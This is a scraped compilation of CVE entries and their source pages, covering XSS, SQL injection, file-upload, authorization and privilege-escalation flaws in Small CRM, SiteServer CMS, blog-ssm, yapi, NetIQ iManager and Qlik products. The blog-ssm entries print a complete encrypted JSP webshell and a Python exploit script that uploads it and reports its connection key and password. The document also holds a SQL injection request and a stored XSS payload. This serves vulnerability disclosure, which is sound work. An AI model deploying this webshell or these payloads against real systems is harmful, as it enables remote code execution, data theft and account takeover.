A cross-site scripting (XSS) vulnerability in the Create Ticket page of Small CRM v3.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Subject parameter.

**\# Exploit Title: Small CRM — Stored Cross-Site Scripting Vulnerability.  
\# Date: 12-Nov-2022  
\# Exploit Author: Venkata Siva Kumar Medituru  
\# Vendor Homepage:** **https://phpgurukul.com/****\# Software Link:** **https://phpgurukul.com/small-crm-php/****\# Version: 3.0  
\# Tested on: Windows 10  
\# Contact:** **https://www.linkedin.com/in/shivakumar-m-v/**

Stored XSS Vulnerability : Cross-site scripting attacks, also called XSS attacks, are a type of injection attack that injects malicious code into specific input fields. If the inputs fields are not validating or not sanitizing the user input then attacker can run malicious script that runs at server side.

Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type-II XSS.

**Attack vector:  
**This vulnerability can results attacker injecting the XSS payload in the Subject input Field in “Create Ticket” page and each time user visits the “View Ticket” page, the XSS triggers and the attacker can able to steal the cookie according to the crafted payload.

**Vulnerable Parameter:** Subject.

The Reproducive Steps are given in Video PoC.

**Impact:**

XSS may results to Cookie Stealing, Session Hijacking, Redirection, Account Takeovers and many malicious activities will be performed by perpetrators.

**Mitigations:**

01) Implement Web Application Firewall

02) Configure Security Headers that will validate user input and allow the request.

03) Encode user input wherever possible.

CVE-2022-47073: Stored XSS found in Small CRM (phpgurukul) - Shiva Kumar M V - Medium

SiteServer CMS 7.1.3 has a SQL injection vulnerability the background.

Environmental information:sscms7.1.3+mysql(background administrator)

**Vulnerability details**

api/admin/common/tableStyle/layerEditor

**step1**

\\SSCMS.Web\\Controllers\\Admin\\Common\\TableStyle\\LayerEditorController.Submit.cs#update function  

**step2**

  
  
After entering the InsertObjectAsync method of \\cms-sscms-v7.1.3\\src\\Datory\\Utils\\RepositoryUtils.Insert.cs  
  
The table is directly passed into the sql statement without filtering  
Finally, the returned result has not yet been filtered and other operations on the sql statement  
resulting in the occurrence of sql vulnerabilities  
Vulnerability to reproduce

exploit result  
\`  
POST /api/admin/common/tableStyle/layerEditor HTTP/1.1  
Host: 192.168.3.129  
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0  
Content-Length: 338  
Accept: application/json, text/plain, _/_  
Accept-Language: zh-CN,zh;q=0.9  
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNjY2MTY2NTA0LCJleHAiOjE2NjYyNTI5MDQsImlhdCI6MTY2NjE2NjUwNH0.ZyaN5rNgUQxxkfxp3-GEV\_e3RdiKPG4BjVFKBPZkdTU  
Content-Type: application/json;charset=UTF-8  
Cookie: .AspNetCore.Antiforgery.63-E5AgGJCk=CfDJ8M6RIMVIA85OqO7ajAvAmn0W\_d4giFi-UZleDB9SmjuNjqZshLg6aw57gScnZlpH6U67ohL01F-C9bjGigmapHHvA5s3qiVH\_pJSxx6-DoVIkm0H9mRiZ7vnlUqgrXXLDHrtcZvMrPva6Cv41qAIV-I  
Origin: http://192.168.3.129  
Referer: http://192.168.3.129/ss-admin/common/tableStyleLayerEditor/?siteId=1&tableName=siteserver\_Site&relatedIdentities=1%2C0&attributeName=weichat  
Accept-Encoding: gzip

{"attributeName":"weichat","customizeCode":null,"defaultValue":"1","displayName":"111","height":0,"helpText":"11","horizontal":false,"inputType":"Image","isRapid":true,"items":null,"rapidValues":"","relatedFieldId":null,"relatedIdentities":"1,0","tableName":"siteserver\_Site'and/\*\*/extractvalue(1,concat(char(126),user()))and'","taxis":1}

\`

CVE-2022-44297: background sql inject · Issue #3490 · siteserver/cms

File Upload Vulnerability found in Rawchen Blog-ssm v1.0 allowing attackers to execute arbitrary commands and gain escalated privileges via the /uploadFileList component.

**Unrestricted Upload of File with Dangerous Type In /uploadFileList****\[Suggested description\]**

blog-ssm v1.0 was found to contain an arbitrary file upload vulnerability via the component /uploadFileList. This vulnerability allows an attacker to escalate privileges and execute arbitrary commands through a crafted file.

**\[Vulnerability Type\]**

Unrestricted Upload of File with Dangerous Type

**\[Vendor of Product\]**

https://github.com/rawchen/blog-ssm

**\[Affected Product Code Base\]**

1.0

**\[Affected Component\]**

blog-ssm 1.0

OS: Windows/Linux/macOS

Browser: Chrome、Firefox、Safari

**\[Attack Vector\]****Step1:Registered account, username: text123, password: 123456.**

**Step2:Log in to the account you just registered and click "File Management".**

**Step3:Click File Upload, select the Trojan file that has been built in advance, and click Upload.**

**Data Pack**

POST /uploadFileList HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------352203683622881217472510347558
Content-Length: 2854
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/adminFile
Cookie: JSESSIONID=F68B6E11EB57F40C26C413029E832793
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------352203683622881217472510347558
Content-Disposition: form-data; name="files\[\]"; filename="text.jsp"
Content-Type: application/octet-stream

<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte\[\] cb){return super.defineClass(cb, 0, cb.length);} }public byte\[\] x(byte\[\] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte\[\] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class\[\] { byte\[\].class }).invoke(Encoder, new Object\[\] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class\[\] { byte\[\].class }).invoke(Encoder, new Object\[\] { bs });} catch (Exception e2) {}}return value; } public static byte\[\] base64Decode(String bs) throws Exception {Class base64;byte\[\] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte\[\])decoder.getClass().getMethod("decode", new Class\[\] { String.class }).invoke(decoder, new Object\[\] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte\[\])decoder.getClass().getMethod("decodeBuffer", new Class\[\] { String.class }).invoke(decoder, new Object\[\] { bs });} catch (Exception e2) {}}return value; }%><%try{byte\[\] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}
%\>
-----------------------------352203683622881217472510347558--

**Step4:In /file, click text.jsp to get the URL address of WebShell: http://localhost:8081/upload/file/text.jsp.**

**Step5:Connect to the Trojan via http://localhost:8081/upload/file/text.jsp.**

**\[Attack Type\]**

Remote

**\[Impact Code execution\]**

True

**\[Reference(s)\]**

http://cwe.mitre.org/data/definitions/23.html

CVE-2022-40035: Unrestricted Upload of File with Dangerous Type In /uploadFileList · Issue #3 · rawchen/blog-ssm

An issue was discovered in Rawchen blog-ssm v1.0 allows an attacker to obtain sensitive user information by bypassing permission checks via the /adminGetUserList component.

**Improper Authorization In /adminGetUserList****\[Suggested description\]**

blog-ssm v1.0 was found to contain an unauthorized access vulnerability through the component /adminGetUserList. This vulnerability allows an attacker to obtain sensitive user information by bypassing permission checks.

**\[Vulnerability Type\]**

Improper Authorization of Index Containing Sensitive Information

**\[Vendor of Product\]**

https://github.com/rawchen/blog-ssm

**\[Affected Product Code Base\]**

1.0

**\[Affected Component\]**

blog-ssm 1.0

OS: Windows/Linux/macOS

Browser: Chrome、Firefox、Safari

**\[Attack Vector\]****Step1:After a code audit, it was found that /adminGetUserList had unauthorized access and exported sensitive user information, such as account names and passwords.**

**Step2:Registered account, username: text123, password: 123456.**

**Step3:Log in to the account you just registered and access /adminGetUserList to obtain sensitive information such as password.**

**\[Attack Type\]**

Remote

**\[Impact Code execution\]**

False

**\[Reference(s)\]**

https://cwe.mitre.org/data/definitions/285.html

CVE-2022-40036: Improper Authorization In /adminGetUserList · Issue #5 · rawchen/blog-ssm

An issue discovered in Rawchen blog-ssm v1.0 allows remote attacker to escalate privileges and execute arbitrary commands via the component /upFile.

**Unrestricted Upload of File with Dangerous Type In /upFile****\[Suggested description\]**

blog-ssm v1.0 was found to contain an arbitrary file upload vulnerability via the component /upFile. This vulnerability allows an attacker to escalate privileges and execute arbitrary commands through a crafted file.

**\[Vulnerability Type\]**

Unrestricted Upload of File with Dangerous Type

**\[Vendor of Product\]**

https://github.com/rawchen/blog-ssm

**\[Affected Product Code Base\]**

1.0

**\[Affected Component\]**

blog-ssm 1.0

OS: Windows/Linux/macOS

Browser: Chrome、Firefox、Safari

**\[Attack Vector\]****Step1:After a code audit, it was found that /upFile has unauthorized access and arbitrary file uploads.**

**Step2:Build EXP according to the code audit results, and run it to get the URL address of WebShell: http://localhost:8081/upload/blog/20220901/1662015136678.jsp**

**EXP:**

import requests

\# Configure the target URL.
Host \= "localhost:8081"
Path \= "upFile"
Url \= "http://{Host}/{Path}".format(Host\=Host, Path\=Path)
\# Configure Headers.
Headers \= {"sec-ch-ua-mobile": "?0",
           "sec-ch-ua-platform": "\\"Windows\\"",
           "Upgrade-Insecure-Requests": "1",
           "Origin": "http://{Host}".format(Host\=Host),
           "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryNOyNFd8trb922Qzd",
           "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
                         "Chrome/104.0.0.0 Safari/537.36",
           "Connection": "close"}
\# Configure Data, where the WebShell key is KEY, the password is Pass, the payload is JavaDynamicPayload,
\# and the encryptor is JAVA\_AES\_BASE64.
Data \= "------WebKitFormBoundaryNOyNFd8trb922Qzd\\r\\nContent-Disposition: form-data; name=\\"editormd-image-file\\"; " \\
       "filename=\\"text.jsp\\"\\r\\n" \\
       "Content-Type: image/jpeg\\r\\n\\r\\n" \\
       "<%! String xc=\\"3c6e0b8a9c15224a\\"; String pass=\\"pass\\"; String md5=md5(pass+xc); class X extends " \\
       "ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte\[\] cb){return super.defineClass(cb, 0, " \\
       "cb.length);} }public byte\[\] x(byte\[\] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance(" \\
       "\\"AES\\");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),\\"AES\\"));return c.doFinal(s); }catch " \\
       "(Exception e){return null; }} public static String md5(String s) {String ret = null;try {" \\
       "java.security.MessageDigest m;m = java.security.MessageDigest.getInstance(\\"MD5\\");m.update(s.getBytes(), 0, " \\
       "s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {" \\
       "}return ret; } public static String base64Encode(byte\[\] bs) throws Exception {Class base64;String value = " \\
       "null;try {base64=Class.forName(\\"java.util.Base64\\");Object Encoder = base64.getMethod(\\"getEncoder\\", " \\
       "null).invoke(base64, null);value = (String)Encoder.getClass().getMethod(\\"encodeToString\\", new Class\[\] { " \\
       "byte\[\].class }).invoke(Encoder, new Object\[\] { bs });} catch (Exception e) {try { base64=Class.forName(" \\
       "\\"sun.misc.BASE64Encoder\\"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass(" \\
       ").getMethod(\\"encode\\", new Class\[\] { byte\[\].class }).invoke(Encoder, new Object\[\] { bs });} catch (Exception " \\
       "e2) {}}return value; } public static byte\[\] base64Decode(String bs) throws Exception {Class base64;byte\[\] " \\
       "value = null;try {base64=Class.forName(\\"java.util.Base64\\");Object decoder = base64.getMethod(" \\
       "\\"getDecoder\\", null).invoke(base64, null);value = (byte\[\])decoder.getClass().getMethod(\\"decode\\", " \\
       "new Class\[\] { String.class }).invoke(decoder, new Object\[\] { bs });} catch (Exception e) {try { " \\
       "base64=Class.forName(\\"sun.misc.BASE64Decoder\\"); Object decoder = base64.newInstance(); value = (byte\[" \\
       "\])decoder.getClass().getMethod(\\"decodeBuffer\\", new Class\[\] { String.class }).invoke(decoder, new Object\[\] { " \\
       "bs });} catch (Exception e2) {}}return value; }%><%try{byte\[\] data=base64Decode(request.getParameter(" \\
       "pass));data=x(data, false);if (session.getAttribute(\\"payload\\")==null){session.setAttribute(\\"payload\\"," \\
       "new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute(\\"parameters\\"," \\
       "data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((" \\
       "Class)session.getAttribute(\\"payload\\")).newInstance();f.equals(arrOut);f.equals(" \\
       "pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(" \\
       "base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (" \\
       "Exception e){}\\r\\n%>\\r\\n" \\
       "------WebKitFormBoundaryNOyNFd8trb922Qzd--\\r\\n"
response \= requests.post(Url, headers\=Headers, data\=Data)
\# Output WebShell address and connection information.
Path \= response.json()\['url'\]
Url \= "http://{Host}{Path}".format(Host\=Host, Path\=Path)
print("Web\_Shell\_Url:{Url}".format(Url\=Url))
print("Web\_Shell\_Key:{Key}".format(Key\="key"))
print("Web\_Shell\_Pass:{Pass}".format(Pass\="pass"))
print("Web\_Shell\_Payload:{Payload}".format(Payload\="JavaDynamicPayload"))
print("Web\_Shell\_Encryptor:{Encryptor}".format(Encryptor\="JAVA\_AES\_BASE64"))

**Step3:Connect to the Trojan via http://localhost:8081/upload/blog/20220901/1662015136678.jsp.**

**\[Attack Type\]**

Remote

**\[Impact Code execution\]**

True

**\[Reference(s)\]**

http://cwe.mitre.org/data/definitions/23.html

CVE-2022-40037: Unrestricted Upload of File with Dangerous Type In /upFile · Issue #2 · rawchen/blog-ssm

An issue was discovered in the rollback feature of Elastic Endpoint Security for Windows, which could allow unprivileged users to elevate their privileges to those of the LocalSystem account.

CVE-2022-38775: Security issues

Cross-site Scripting (XSS) vulnerability in NetIQ iManager prior to version 3.2.6 allows attacker to execute malicious scripts on the user's browser. This issue affects: Micro Focus NetIQ iManager NetIQ iManager versions prior to 3.2.6 on ALL.

February 2022

NetIQ iManager 3.2 SP6 resolves previous issues. Many of these improvements were made in direct response to suggestions from our customers. We thank you for your time and valuable input. We hope you continue to help us ensure our products meet all your needs. You can post feedback in the iManager Community Support Forums, our community Web site that also includes product notifications, blogs, and product user groups.

For a full list of all issues resolved in NetIQ iManager 3.x, including all patches and service packs, refer to TID 7016795, “History of Issues Resolved in NetIQ iManager 3.x”.

For more information about this release and for the latest release notes, see the iManager Documentation Web site. To download this product, see the Software License and Download portal.

*   What’s New
    
*   System Requirements
    
*   Installing or Upgrading
    
*   Known Issues
    
*   Legal Notice
    

**1.0 What’s New**

iManager 3.2 SP6 provides the following enhancements and fixes in this release:

*   Operating System Support
    
*   Updates for Dependent Components
    
*   Fixed Issues
    

**1.1 Operating System Support**

In addition to the platforms supported in previous releases of iManager, this release adds support for the following:

*   Red Hat Enterprise Linux (RHEL) 8.5
    
*   Windows Server 2022
    

**1.2 Updates for Dependent Components**

This release adds support for the following third-party components:

*   Azul Zulu 1.8.0\_312
    
*   Apache Tomcat 9.0.55-1
    
*   OpenSSL 1.0.2za
    
*   Log4j 2.17.1
    

**1.3 Fixed Issues**

This release includes the following software fixes that resolve several previous issues:

**Resolved Security Vulnerabilities**

This version of iManager resolves security vulnerability CVE-2021-38134. Special thanks to Kajetan Rostojek for responsibly disclosing the information about CVE-2022-38758 to us.

**Occasional Delay When Loading Pages on the iManager User Interface After Upgrading to iManager 3.2.5**

_Fix:_ With the latest version of Tomcat 9.0.55-1 bundled with iManager 3.2.6, there is no longer any delay while loading the pages on the iManager User Interface.(Defect 440043)

**Connection Timeout Issue Seen When Modifying Directory Objects or Using Plug-Ins**

_Fix:_ With the latest version of Tomcat 9.0.55-1 bundled with iManager 3.2.6, there is no longer any delay while navigating the pages or browsing objects on the iManager User Interface. (Defect 448035)

**2.0 System Requirements**

For information about prerequisites, computer requirements, installation, upgrade or migration, see Planning to Install iManager in the NetIQ iManager Installation Guide.

_NOTE:_iManager uses the modified version of XULRunner on Windows. The source code for the modified XULRunner is available under the Mozilla Public License version 2.0. If you need further assistance with any issue, contact Technical Support.

**3.0 Installing or Upgrading**

To upgrade to iManager 3.2 SP6, you need to be on iManager 2.7.7 P11 or higher.

For more information on upgrading to iManager 3.2 SP6, see the NetIQ iManager Installation Guide.

IMPORTANT:

*   This version of iManager supports only eDirectory 9.2.6 or above when both are installed on the same machine. If you are upgrading iManager 2.7.7 P11 to 3.2 SP6, ensure that your eDirectory is also upgraded to 9.2.6 before upgrading iManager.
    
*   When you install or upgrade to iManager 3.2 SP6, a new imanager\_logging.xml file is created that includes the latest log4j 2.17.1 capabilities. During the upgrade process, the existing imanager\_logging.xml file is replaced with a new one. As a result, the previous audit settings are lost. To allow auditing for iManager events, you must configure the audit settings again in the new imanager\_logging.xml file after the upgrade. Make sure to take a backup of the existing file in a different location before performing the upgrade. For more information, see Auditing iManager Events in the NetIQ iManager Administration Guide.
    

**4.0 Known Issues**

NetIQ Corporation strives to ensure our products provide quality solutions for your enterprise software needs. There are no new issues other than the issues mentioned in the NetIQ iManager 3.2 SP5 Release Notes. If you need further assistance with any issue, please contact Technical Support.

**4.1 iManager Workstation Does Not Work on SLED 12 SP3, SLED 15, OpenSUSE Leap 42.3, OpenSUSE 13.2, and Onward**

_Workaround:_ To workaround this issue, launch iManager using the iManager.sh command and access the workstation through another browser via the URL: http://localhost:8080/nps. The port number can differ. You can find the port number in the iManager.log file located at <extracted\_directory>/imanager/bin/iManager.log location.

**5.0 Legal Notice**

For information about legal notices, trademarks, disclaimers, warranties, export and other use restrictions, U.S. Government rights, patent policy, and FIPS compliance, see https://www.netiq.com/company/legal/.

Copyright © 2022 NetIQ Corporation, a Micro Focus company. All Rights Reserved.

CVE-2022-38758: NetIQ iManager 3.2 Service Pack 6 Release Notes

Cross Site Scripting (XSS) vulnerability in yapi 1.9.1 allows attackers to execute arbitrary code via the /interface/api edit page.

**版本号**

~ 1.9.1

**什么问题**

~Stored XSS in remarks of the interface

**如何复现此问题**

~ Demo: https://yapi.baidu.com

1.  Create a group after login:  
    
2.  Then create a new project:  
    
3.  Enter the project, and add an interface:  
    
4.  After adding successfully, enter the interface edit page:  
    
5.  Scroll down to the remark module. Insert the payload:  
    <? =><video src=x onerror=alert(document.domain)>  
    
6.  After saving, return to the group. Click on the member list and add the username we want to attack. (There is no need for confirmation from the target user, as long as the user name is correct, the target user can be added to the project. Here we use another account to test.)  
    
7.  After the victim logged into the system, he found that he was added to a group:  
    
8.  He entered the group, viewed the project interface, entered the edit page, and triggered the XSS Payload inserted by the attacker.  
    

**什么浏览器**

~ Firefox Chrome

**什么系统（Linux, Windows, macOS）**

macOS

CVE-2021-36686: Stored XSS in remarks of the interface · Issue #2190 · YMFE/yapi

Qlik NPrinting Designer through 21.14.3.0 creates a Temporary File in a Directory with Insecure Permissions.

**MNDT-2023-0002****Description**

Qlik NPrinting Designer for Windows contains a local privilege escalation vulnerability which affected version 21.14.3.0.

**Impact**

High - Exploiting the vulnerability will give a local unprivileged attacker SYSTEM level privileges.

**Exploitability**

Medium - Any authenticated local user can exploit the vulnerability and an exploit is trivial to produce.

**CVE Reference**

CVE-2021-41988

**Common Weakness Enumeration**

CWE-379: Creation of Temporary File in Directory with Insecure Permissions

**Common Vulnerability Scoring System**

Base Score: 7.8 - Vector: AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

**Technical Details**

The installation of the agent uses the Windows Installer framework and an MSI file is cached in c:\\windows\\installer. An unprivileged user can trigger a repair operation, either by using the Windows Installer API or by running "msiexec.exe /fa c:\\windows\\installer\\\[XXXXX\].msi".

Running a repair operation will trigger a number of file operations in the %TEMP% folder of the user triggering the repair. Some of these operations will be performed from a SYSTEM context (started via the Windows Installer service), including the execution of temporary files.

**Resolution**

The issue was fixed with the May 2022 Service Release 2. Update to address the vulnerability.

**Discovery Credits**

*   Ronnie Salomonsen, Mandiant

**Disclosure Timeline**

*   05-Oct-2021 - Issue reported to Qlik
*   17-Nov-2021 - Issue confirmed by Qlik and a fix scheduled for Nov 11, 2022.
*   11-Nov-2022 - Patched version released by Qlik

**References**

*   Qlik Security Advisory
*   Mitre CVE-2021-41988

CVE-2021-41988: Vulnerability-Disclosures/MNDT-2023-0002.md at master · mandiant/Vulnerability-Disclosures

Qlik QlikView through 12.60.20100.0 creates a Temporary File in a Directory with Insecure Permissions.

**MNDT-2023-0001****Description**

Qlik QlikView for Windows contains a local privilege escalation vulnerability which affected version 12.60.20100.0.

**Impact**

High - Exploiting the vulnerability will give a local unprivileged attacker SYSTEM level privileges.

**Exploitability**

Medium - Any authenticated local user can exploit the vulnerability and an exploit is trivial to produce.

**CVE Reference**

CVE-2021-41989

**Common Weakness Enumeration**

CWE-379: Creation of Temporary File in Directory with Insecure Permissions

**Common Vulnerability Scoring System**

Base Score: 7.8 - Vector: AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

**Technical Details**

The installation of the agent uses the Windows Installer framework and an MSI file is cached in c:\\windows\\installer. An unprivileged user can trigger a repair operation, either by using the Windows Installer API or by running "msiexec.exe /fa c:\\windows\\installer\\\[XXXXX\].msi".

Running a repair operation will trigger a number of file operations in the %TEMP% folder of the user triggering the repair. Some of these operations will be performed from a SYSTEM context (started via the Windows Installer service), including the execution of temporary files.

**Resolution**

The issue was fixed with the May 2022 Initial Release to Service Release 1. Update to address the vulnerability.

**Discovery Credits**

*   Ronnie Salomonsen, Mandiant

**Disclosure Timeline**

*   05-Oct-2021 - Issue reported to Qlik
*   17-Nov-2021 - Issue confirmed by Qlik and a fix scheduled for Oct 5, 2022.
*   05-Oct-2022 - Patched version released by Qlik

**References**

*   Qlik Security Advisory
*   Mitre CVE-2021-41989

Tag

#windows